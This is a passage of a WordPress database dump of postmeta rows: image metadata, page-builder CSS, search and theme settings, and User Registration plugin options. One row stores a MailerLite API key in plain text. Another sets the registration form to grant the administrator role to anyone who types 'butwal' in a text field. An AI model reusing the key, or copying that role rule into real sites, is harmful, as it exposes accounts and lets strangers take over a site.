xels-pixabay-71116-1920x1946.jpg\";s:5:\"width\";i:1920;s:6:\"height\";i:1946;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:439520;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}s:14:\"original_image\";s:24:\"pexels-pixabay-71116.jpg\";}'),
(20684,2631,'_thumbnail_id','3304'),
(20685,3308,'_wpb_shortcodes_custom_css','.vc_custom_1668005747937{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}.vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}.vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}.vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010492701{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1668024005657{margin-top: 25px !important;}.vc_custom_1668021106220{border-top-width: 25px !important;padding-top: 25px !important;}.vc_custom_1668021047643{margin-top: 25px !important;}.vc_custom_1668021165897{padding-top: 40px !important;}.vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1668020734563{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(20686,3309,'_is_includes','a:5:{s:9:\"post_type\";a:4:{s:4:\"post\";s:4:\"post\";s:4:\"page\";s:4:\"page\";s:10:\"attachment\";s:10:\"attachment\";s:10:\"give_forms\";s:10:\"give_forms\";}s:12:\"search_title\";i:1;s:14:\"search_content\";i:1;s:14:\"search_excerpt\";i:1;s:11:\"post_status\";a:2:{s:7:\"publish\";s:7:\"publish\";s:7:\"inherit\";s:7:\"inherit\";}}'),
(20687,3309,'_is_excludes',''),
(20688,3309,'_is_settings','a:2:{s:7:\"orderby\";s:4:\"date\";s:5:\"order\";s:4:\"DESC\";}'),
(20689,3309,'_is_ajax',NULL),
(20690,3309,'_is_customize',NULL),
(20691,3309,'_is_locale','en_US'),
(20692,3310,'_is_includes','a:5:{s:9:\"post_type\";a:3:{s:4:\"post\";s:4:\"post\";s:4:\"page\";s:4:\"page\";s:10:\"give_forms\";s:10:\"give_forms\";}s:12:\"search_title\";i:1;s:14:\"search_content\";i:1;s:14:\"search_excerpt\";i:1;s:11:\"post_status\";a:2:{s:7:\"publish\";s:7:\"publish\";s:7:\"inherit\";s:7:\"inherit\";}}'),
(20693,3310,'_is_excludes',''),
(20694,3310,'_is_settings','a:2:{s:7:\"orderby\";s:4:\"date\";s:5:\"order\";s:4:\"DESC\";}'),
(20695,3310,'_is_ajax',NULL),
(20696,3310,'_is_customize',NULL),
(20697,3310,'_is_locale','en_US'),
(20698,3311,'_is_includes','a:5:{s:9:\"post_type\";a:4:{s:4:\"post\";s:4:\"post\";s:4:\"page\";s:4:\"page\";s:10:\"attachment\";s:10:\"attachment\";s:10:\"give_forms\";s:10:\"give_forms\";}s:12:\"search_title\";i:1;s:14:\"search_content\";i:1;s:14:\"search_excerpt\";i:1;s:11:\"post_status\";a:2:{s:7:\"publish\";s:7:\"publish\";s:7:\"inherit\";s:7:\"inherit\";}}'),
(20699,3311,'_is_excludes',''),
(20700,3311,'_is_settings','a:2:{s:7:\"orderby\";s:4:\"date\";s:5:\"order\";s:4:\"DESC\";}'),
(20701,3311,'_is_ajax','a:17:{s:11:\"enable_ajax\";i:1;s:16:\"show_description\";i:1;s:18:\"description_source\";s:7:\"excerpt\";s:18:\"description_length\";i:20;s:10:\"show_image\";i:1;s:17:\"min_no_for_search\";i:1;s:21:\"result_box_max_height\";i:400;s:18:\"nothing_found_text\";s:13:\"Nothing found\";s:16:\"show_more_result\";i:1;s:16:\"more_result_text\";s:14:\"More Results..\";s:14:\"search_results\";s:4:\"both\";s:10:\"show_price\";i:1;s:24:\"show_matching_categories\";i:1;s:16:\"show_details_box\";i:1;s:12:\"product_list\";s:3:\"all\";s:8:\"order_by\";s:4:\"date\";s:5:\"order\";s:4:\"desc\";}'),
(20702,3311,'_is_customize',NULL),
(20703,3311,'_is_locale','en_US'),
(20704,3312,'_is_includes','a:5:{s:9:\"post_type\";a:1:{s:7:\"product\";s:7:\"product\";}s:12:\"search_title\";i:1;s:14:\"search_content\";i:1;s:14:\"search_excerpt\";i:1;s:11:\"post_status\";a:2:{s:7:\"publish\";s:7:\"publish\";s:7:\"inherit\";s:7:\"inherit\";}}'),
(20705,3312,'_is_excludes',''),
(20706,3312,'_is_settings','a:2:{s:7:\"orderby\";s:4:\"date\";s:5:\"order\";s:4:\"DESC\";}'),
(20707,3312,'_is_ajax','a:17:{s:11:\"enable_ajax\";i:1;s:16:\"show_description\";i:1;s:18:\"description_source\";s:7:\"excerpt\";s:18:\"description_length\";i:20;s:10:\"show_image\";i:1;s:17:\"min_no_for_search\";i:1;s:21:\"result_box_max_height\";i:400;s:18:\"nothing_found_text\";s:13:\"Nothing found\";s:16:\"show_more_result\";i:1;s:16:\"more_result_text\";s:14:\"More Results..\";s:14:\"search_results\";s:4:\"both\";s:10:\"show_price\";i:1;s:24:\"show_matching_categories\";i:1;s:16:\"show_details_box\";i:1;s:12:\"product_list\";s:3:\"all\";s:8:\"order_by\";s:4:\"date\";s:5:\"order\";s:4:\"desc\";}'),
(20708,3312,'_is_customize',NULL),
(20709,3312,'_is_locale','en_US'),
(20710,3321,'user_registration_form_setting_login_options','default'),
(20711,3321,'user_registration_form_setting_default_user_role','subscriber'),
(20712,3321,'user_registration_form_setting_enable_strong_password',''),
(20713,3321,'user_registration_form_setting_minimum_password_strength','3'),
(20714,3321,'user_registration_form_setting_redirect_options',''),
(20715,3321,'user_registration_form_setting_form_submit_class',''),
(20716,3321,'user_registration_form_setting_form_submit_label','Submit'),
(20717,3321,'user_registration_form_setting_success_message_position','1'),
(20718,3321,'user_registration_form_setting_enable_recaptcha_support',''),
(20719,3321,'user_registration_form_template','Default'),
(20720,3321,'user_registration_form_custom_class',''),
(20721,3321,'user_registration_form_setting_enable_assign_user_role_conditionally','1'),
(20722,3321,'user_registration_social_connect_btn',''),
(20723,3321,'user_registration_select_email_template','none'),
(20724,3321,'user_registration_form_setting_enable_reset_button',''),
(20725,3321,'user_registration_form_setting_form_reset_class',''),
(20726,3321,'user_registration_form_setting_form_reset_label','Reset'),
(20727,3321,'user_registration_enable_multipart',''),
(20728,3321,'user_registration_multipart_indicator','progress'),
(20729,3321,'user_registration_multipart_indicator_color','#475bb2'),
(20730,3321,'user_registration_multipart_nav_align','split'),
(20731,3321,'user_registration_enable_paypal_standard',''),
(20732,3321,'user_registration_paypal_email_address','lekhnath005@gmail.com'),
(20733,3321,'user_registration_paypal_mode','production'),
(20734,3321,'user_registration_paypal_type','products'),
(20735,3321,'user_registration_paypal_cancel_url','https://wpeverest.me'),
(20736,3321,'user_registration_paypal_return_url','https://wpeverest.me/wp-login.php'),
(20737,3321,'user_registration_enable_stripe',''),
(20738,3321,'user_registration_enable_stripe_recurring',''),
(20739,3321,'user_registration_stripe_plan_name',''),
(20740,3321,'user_registration_stripe_interval_count',''),
(20741,3321,'user_registration_stripe_recurring_period','year'),
(20742,3321,'user_registration_enable_zapier',''),
(20743,3321,'user_registration_zapier_webhook_url',''),
(20744,3321,'user_registration_zapier_need_user_approval',''),
(20745,3321,'user_registration_zapier_trigger_on_profile_update',''),
(20746,3321,'user_registration_zapier_trigger_on_checkout',''),
(20747,3321,'user_registration_multipart_parts','[{\"id\":\"1\",\"name\":\"Part Title\",\"next\":\"Next\",\"prev\":\"Previous\",\"rows\":\"[1,2,3,4,5,6,7,8,10]\"}]'),
(20748,3321,'user_registration_mailerlite_integration','s:312:\"a:5:{s:7:\"api_key\";s:32:\"4ea570b88caf1c6cf472a2153108bfa7\";s:11:\"list_fields\";s:2:\"{}\";s:12:\"double_optin\";s:5:\"false\";s:24:\"enable_conditional_logic\";s:5:\"false\";s:22:\"conditional_logic_data\";a:3:{s:17:\"conditional_field\";s:10:\"first_name\";s:20:\"conditional_operator\";s:2:\"is\";s:17:\"conditional_value\";s:0:\"\";}}\";'),
(20749,3321,'user_registration_user_role_condition','s:434:\"a:1:{i:0;a:2:{s:11:\"assign_role\";s:13:\"administrator\";s:10:\"conditions\";a:1:{i:0;a:3:{i:0;a:2:{s:9:\"field_key\";s:45:\"user_registration_form_fields[condition_1][1]\";s:11:\"field_value\";s:19:\"textarea_1623050614\";}i:1;a:2:{s:9:\"field_key\";s:47:\"user_registration_form_operator[condition_1][1]\";s:11:\"field_value\";s:2:\"is\";}i:2;a:2:{s:9:\"field_key\";s:44:\"user_registration_form_value[condition_1][1]\";s:11:\"field_value\";s:6:\"butwal\";}}}}}\";'),
(20750,3321,'user_registration_pdf_submission_to_admin',''),
(20751,3321,'user_registration_pdf_submission_to_user',''),
(20752,3321,'user_registration_enable_field_icon',''),
(20753,3321,'user_registration_learndash_courses',''),
(20754,3321,'user_registration_paypal_conditional_integration','s:60:\"a:1:{i:0;a:1:{s:24:\"enable_conditional_logic\";s:5:\"false\";}}\";'),
(20755,3321,'user_registration_stripe_conditional_integration','s:60:\"a:1:{i:0;a:1:{s:24:\"enable_conditional_logic\";s:5:\"false\";}}\";'),
(20756,3321,'user_registration_form_setting_enable_email_approval',''),
(20757,3321,'user_registration_enable_paypal_standard_subscription',''),
(20758,3321,'user_registration_paypal_plan_name',''),
(20759,3321,'user_registration_paypal_interval_count',''),
(20760,3321,'user_registration_paypal_recurring_period','DAY'),
(20761,3321,'user_registration_enable_sync_fields_with_stripe',''),
(20762,3321,'user_registration_stripe_sync_full_name',''),
(20763,3321,'user_registration_stripe_sync_description',''),
(20764,3321,'user_registration_stripe_sync_phone',''),
(20765,3321,'user_registration_enable_sync_address_with_stripe',''),
(20766,3321,'user_registration_stripe_sync_city',''),
(20767,3321,'user_registration_stripe_sync_country',''),
(20768,3321,'user_registration_stripe_sync_line1',''),
(20769,3321,'user_registration_stripe_sync_line2',''),
(20770,3321,'user_registration_stripe_sync_postal_code',''),
(20771,3321,'user_registration_stripe_sync_state',''),
(20772,3321,'user_registration_enable_sync_shipping_address_with_stripe',''),
(20773,3321,'user_registration_stripe_sync_shipping_full_name',''),
(20774,3321,'user_registration_stripe_sync_shipping_phone',''),
(20775,3321,'user_registration_stripe_sync_shipping_city',''),
(20776,3321,'user_registration_stripe_sync_shipping_country',''),
(20777,3321,'user_registration_stripe_sync_shipping_line1',''),
(20778,3321,'user_registration_stripe_sync_shipping_line2',''),
(20779,3321,'user_registration_stripe_sync_shipping_postal_code',''),
(20780,3321,'user_registration_stripe_sync_shipping_state',''),
(20781,3321,'user_registration_form_row_ids','[\"0\",\"1\",\"2\",\"3\",\"4\",\"5\",\"6\",\"7\",\"8\"]'),
(20782,3321,'user_registration_pro_auto_password_activate',''),
(20783,3321,'user_registration_pro_auto_generated_password_length','10'),
(20784,3321,'user_registration_pro_spam_protection_by_honeypot_enable',''),
(20785,3321,'user_registration_mailchimp_integration','s:6:\"a:0:{}\";'),
(20786,3325,'_wp_attached_file','2022/11/gsw2023_for.jpg'),
(20787,3325,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1261;s:6:\"height\";i:219;s:4:\"file\";s:23:\"2022/11/gsw2023_for.jpg\";s:8:\"filesize\";i:205597;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:22:\"gsw2023_for-300x52.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:52;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5329;}s:5:\"large\";a:5:{s:4:\"file\";s:24:\"gsw2023_for-1024x178.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:178;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:38796;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:23:\"gsw2023_for-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6245;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:23:\"gsw2023_for-768x133.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:133;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24690;}s:6:\"awb_sm\";a:5:{s:4:\"file\";s:22:\"gsw2023_for-500x87.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:87;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:12123;}s:6:\"awb_md\";a:5:{s:4:\"file\";s:23:\"gsw2023_for-800x139.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:139;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:26460;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(20788,3326,'_wp_attached_file','2022/11/gsw2023_for-1.jpg'),
(20789,3326,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1261;s:6:\"height\";i:219;s:4:\"file\";s:25:\"2022/11/gsw2023_for-1.jpg\";s:8:\"filesize\";i:205597;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:24:\"gsw2023_for-1-300x52.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:52;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5329;}s:5:\"large\";a:5:{s:4:\"file\";s:26:\"gsw2023_for-1-1024x178.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:178;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:38796;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"gsw2023_for-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6245;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:25:\"gsw2023_for-1-768x133.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:133;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24690;}s:6:\"awb_sm\";a:5:{s:4:\"file\";s:24:\"gsw2023_for-1-500x87.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:87;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:12123;}s:6:\"awb_md\";a:5:{s:4:\"file\";s:25:\"gsw2023_for-1-800x139.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:139;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:26460;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(20790,3327,'_wp_attached_file','2022/11/gsw2023_for-2.jpg'),
(20791,3327,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1261;s:6:\"height\";i:219;s:4:\"file\";s:25:\"2022/11/gsw2023_for-2.jpg\";s:8:\"filesize\";i:205597;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:24:\"gsw2023_for-2-300x52.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:52;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5329;}s:5:\"large\";a:5:{s:4:\"file\";s:26:\"gsw2023_for-2-1024x178.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:178;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:38796;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"gsw2023_for-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6245;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:25:\"gsw2023_for-2-768x133.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:133;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24690;}s:6:\"awb_sm\";a:5:{s:4:\"file\";s:24:\"gsw2023_for-2-500x87.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:87;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:12123;}s:6:\"awb_md\";a:5:{s:4:\"file\";s:25:\"gsw2023_for-2-800x139.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:139;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:26460;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(20794,3330,'_wp_attached_file','2022/11/gsw2023_for2.jpg'),
(20795,3330,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1261;s:6:\"height\";i:219;s:4:\"file\";s:24:\"2022/11/gsw2023_for2.jpg\";s:8:\"filesize\";i:247743;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:23:\"gsw2023_for2-300x52.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:52;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6187;}s:5:\"large\";a:5:{s:4:\"file\";s:25:\"gsw2023_for2-1024x178.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:178;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:46405;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:24:\"gsw2023_for2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8340;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:24:\"gsw2023_for2-768x133.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:133;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:29333;}s:6:\"awb_sm\";a:5:{s:4:\"file\";s:23:\"gsw2023_for2-500x87.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:87;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14296;}s:6:\"awb_md\";a:5:{s:4:\"file\";s:24:\"gsw2023_for2-800x139.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:139;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:31596;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(20796,3331,'_wp_attached_file','2022/11/gsw2023_for2-1.jpg'),
(20797,3331,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1261;s:6:\"height\";i:219;s:4:\"file\";s:26:\"2022/11/gsw2023_for2-1.jpg\";s:8:\"filesize\";i:239762;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:25:\"gsw2023_for2-1-300x52.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:52;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6333;}s:5:\"large\";a:5:{s:4:\"file\";s:27:\"gsw2023_for2-1-1024x178.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:178;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:45647;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:26:\"gsw2023_for2-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8219;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:26:\"gsw2023_for2-1-768x133.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:133;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:29012;}s:6:\"awb_sm\";a:5:{s:4:\"file\";s:25:\"gsw2023_for2-1-500x87.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:87;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14620;}s:6:\"awb_md\";a:5:{s:4:\"file\";s:26:\"gsw2023_for2-1-800x139.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:139;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:31539;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(20798,3049,'_thumbnail_id','3326'),
(20799,3043,'rs_page_bg_color',''),
(20800,3332,'_wp_attached_file','2022/11/gsw2023_for2-2.jpg'),
(20801,3332,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1261;s:6:\"height\";i:219;s:4:\"file\";s:26:\"2022/11/gsw2023_for2-2.jpg\";s:8:\"filesize\";i:247621;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:25:\"gsw2023_for2-2-300x52.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:52;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6295;}s:5:\"large\";a:5:{s:4:\"file\";s:27:\"gsw2023_for2-2-1024x178.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:178;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:45753;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:26:\"gsw2023_for2-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8168;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:26:\"gsw2023_for2-2-768x133.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:133;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:29212;}s:6:\"awb_sm\";a:5:{s:4:\"file\";s:25:\"gsw2023_for2-2-500x87.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:87;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14608;}s:6:\"awb_md\";a:5:{s:4:\"file\";s:26:\"gsw2023_for2-2-800x139.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:139;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:31635;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(20802,3334,'_edit_lock','1675608501:1'),
(20803,3335,'_wp_attached_file','2022/11/w22m1.jpg'),
(20804,3335,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:619;s:6:\"height\";i:160;s:4:\"file\";s:17:\"2022/11/w22m1.jpg\";s:8:\"filesize\";i:77821;s:5:\"sizes\";a:3:{s:6:\"medium\";a:5:{s:4:\"file\";s:16:\"w22m1-300x78.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:78;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6068;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:17:\"w22m1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4881;}s:6:\"awb_sm\";a:5:{s:4:\"file\";s:17:\"w22m1-500x129.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:129;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:12768;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(20805,3334,'_thumbnail_id','3335'),
(20806,3334,'_edit_last','1'),
(20807,3334,'_wpb_vc_js_status','true'),
(20808,3334,'_dt_sidebar_position','disabled'),
(20809,3334,'_dt_sidebar_widgetarea_id','sidebar_1'),
(20810,3334,'_dt_sidebar_hide_on_mobile','0'),
(20811,3334,'_dt_footer_show','1'),
(20812,3334,'_dt_footer_widgetarea_id','sidebar_2'),
(20813,3334,'_dt_footer_hide_on_mobile','0'),
(20814,3334,'_dt_header_title','fancy'),
(20815,3334,'_dt_header_background','normal'),
(20816,3334,'_dt_header_background_below_slideshow','disabled'),
(20817,3334,'_dt_header_transparent_bg_color_scheme','light'),
(20818,3334,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(20819,3334,'_dt_header_transparent_top_bar_bg_opacity','25'),
(20820,3334,'_dt_header_transparent_bg_color','#000000'),
(20821,3334,'_dt_header_transparent_bg_opacity','50'),
(20822,3334,'_dt_header_disabled_background','normal'),
(20823,3334,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(20824,3334,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(20825,3334,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(20826,3334,'_dt_header_disabled_transparent_bg_color','#000000'),
(20827,3334,'_dt_header_disabled_transparent_bg_opacity','50'),
(20828,3334,'_dt_page_overrides_top_margin',''),
(20829,3334,'_dt_page_overrides_right_margin',''),
(20830,3334,'_dt_page_overrides_bottom_margin',''),
(20831,3334,'_dt_page_overrides_left_margin',''),
(20832,3334,'_dt_mobile_page_padding_top',''),
(20833,3334,'_dt_mobile_page_padding_right',''),
(20834,3334,'_dt_mobile_page_padding_bottom',''),
(20835,3334,'_dt_mobile_page_padding_left',''),
(20836,3334,'_dt_fancy_header_layout_heading',''),
(20837,3334,'_dt_fancy_header_title_aligment','center'),
(20838,3334,'_dt_fancy_header_height','300'),
(20839,3334,'_dt_fancy_header_padding-top','0px'),
(20840,3334,'_dt_fancy_header_padding-bottom','0px'),
(20841,3334,'_dt_fancy_header_breadcrumbs_heading',''),
